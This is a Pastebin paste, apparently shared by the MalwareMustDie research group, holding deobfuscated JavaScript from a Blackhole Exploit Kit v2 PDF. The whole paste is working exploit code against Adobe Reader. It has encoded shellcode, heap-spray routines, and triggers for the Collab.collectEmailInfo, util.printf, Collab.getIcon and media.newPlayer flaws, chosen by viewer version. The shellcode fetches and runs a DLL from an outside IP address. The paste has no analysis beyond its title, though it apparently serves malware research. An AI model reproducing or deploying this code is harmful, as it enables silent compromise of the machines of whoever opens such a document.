SHARE
TWEET

#MalwareMustDie - BHEK2/PluginDetect0.7.9-PDF/JS-deobs

MalwareMustDie Nov 17th, 2012 19,843 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. bjsg = '
  2. %u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db
  3. %u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175
  4. %uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33
  5. %ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b
  6. %uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433
  7. %u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68
  8. %u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d
  9. %u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224
  10. %u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b
  11. %uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830
  12. %u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83
  13. %u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff
  14. %ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f
  15. %u7468%u7074%u2f3a%u322f%u3330%u382e%u2e30%u3631%u382e%u3a31%u3038%u3038%u662f%u726f%u6d75
  16. %u6c2f%u6e69%u736b%u632f%u6c6f%u6d75%u2e6e%u6870%u3f70%u6676%u3d67%u3033%u313a%u3a6e%u6931
  17. %u313a%u3a69%u3333%u6326%u6361%u706a%u323d%u3a76%u6b31%u313a%u3a6d%u3233%u333a%u3a33%u6b31
  18. %u313a%u3a6b%u3133%u313a%u3a6a%u6f31%u7a26%u7262%u6279%u3d78%u6831%u6726%u6866%u783d%u6f64
  19. %u2671%u7368%u6870%u3d67%u6465%u7869%u6967%u6c64%u0000';
  20. function ezvr(ra, qy){
  21.   while (ra.length * 2 < qy){
  22.     ra += ra
  23.   }
  24.   ra = ra.substring(0, qy / 2);
  25.   return ra
  26. }
  27. function bx(){
  28.   var dkg = new Array();
  29.   var vw = 0x0c0c0c0c;
  30.   var addr = 0x400000;
  31.   var payload = unescape(bjsg);
  32.   var sc_len = payload.length * 2;
  33.   var qy = addr - (sc_len + 0x38);
  34.   var yarsp = unescape("%u9090%u9090");
  35.   yarsp = ezvr(yarsp, qy);
  36.   var count2 = (vw - 0x400000) / addr;
  37.   for (var count = 0; count < count2; count ++ ){
  38.     dkg[count] = yarsp + payload
  39.   }
  40.   var overflow = unescape("%u0c0c%u0c0c");
  41.   while (overflow.length < 44952){
  42.     overflow += overflow
  43.   }
  44.   this .collabStore = Collab.collectEmailInfo({
  45.     subj : "", msg : overflow
  46.   }
  47.   )
  48. }
  49. function printf(){
  50.   nop = unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
  51.   var payload = unescape(bjsg);
  52.   heapblock = nop + payload;
  53.   bigblock = unescape("%u0A0A%u0A0A");
  54.   headersize = 20;
  55.   spray = headersize + heapblock.length;
  56.   while (bigblock.length < spray){
  57.     bigblock += bigblock
  58.   }
  59.   fillblock = bigblock.substring(0, spray);
  60.   block = bigblock.substring(0, bigblock.length - spray);
  61.   while (block.length + spray < 0x40000){
  62.     block = block + block + fillblock
  63.   }
  64.   mem = new Array();
  65.   for (i = 0; i < 1400; i ++ ){
  66.     mem[i] = block + heapblock
  67.   }
  68.   var num =
  69. 129999999999999999998888888888888888888888888888888888888888888888888888888888888888888888
  70. 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
  71. 888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888
  72. 88888888888888888888888888;
  73.   util.printf("%45000f", num)
  74. }
  75. function geticon(){
  76.   var arry = new Array();
  77.   if (app.doc.Collab.getIcon){
  78.     var payload = unescape(bjsg);
  79.     var hWq500CN = payload.length * 2;
  80.     var qy = 0x400000 - (hWq500CN + 0x38);
  81.     var yarsp = unescape("%u9090%u9090");
  82.     yarsp = ezvr(yarsp, qy);
  83.     var p5AjK65f = (0x0c0c0c0c - 0x400000) / 0x400000;
  84.     for (var vqcQD96y = 0; vqcQD96y < p5AjK65f; vqcQD96y ++ ){
  85.       arry[vqcQD96y] = yarsp + payload
  86.     }
  87.     var tUMhNbGw = unescape("%09");
  88.     while (tUMhNbGw.length < 0x4000){
  89.       tUMhNbGw += tUMhNbGw
  90.     }
  91.     tUMhNbGw = "N." + tUMhNbGw;
  92.     app.doc.Collab.getIcon(tUMhNbGw)
  93.   }
  94. }
  95. aPlugins = app.plugIns;
  96. var sv = parseInt(app.viewerVersion.toString().charAt(0));
  97. for (var i = 0; i < aPlugins.length; i ++ ){
  98.   if (aPlugins[i].name == 'EScript'){
  99.     var lv = aPlugins[i].version
  100.   }
  101. }
  102. if ((lv == 9) || ((sv == 8) && (lv <= 8.12))){
  103.   geticon()
  104. }
  105. else if (lv == 7.1){
  106.   printf()
  107. }
  108. else if (((sv == 6) || (sv == 7)) && (lv < 7.11)){
  109.   bx()
  110. }
  111. else if ((lv >= 9.1) || (lv <= 9.2) || (lv >= 8.13) || (lv <= 8.17)){
  112.   function a(){
  113.     util.printd('p@111111111111111111111111 : yyyy111', new Date())
  114.   }
  115.   var h = app.plugIns;
  116.   for (var f = 0; f < h.length; f ++ ){
  117.     if (h[f].name == 'EScript'){
  118.       var i = h[f].version
  119.     }
  120.   }
  121.   if ((i > 8.12) && (i < 8.2)){
  122.     c = new Array();
  123.     var d = unescape('%u9090%u9090');
  124.     var e = unescape(bjsg);
  125.     while (d.length <= 0x8000){
  126.       d += d
  127.     }
  128.     d = d.substr(0, 0x8000 - e.length);
  129.     for (f = 0; f < 2900; f ++ ){
  130.       c[f] = d + e
  131.     }
  132.     a();
  133.     a();
  134.     try {
  135.       this .media.newPlayer(null)
  136.     }
  137.     catch (e){
  138.     }
  139.     a()
  140.   }
  141. }
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top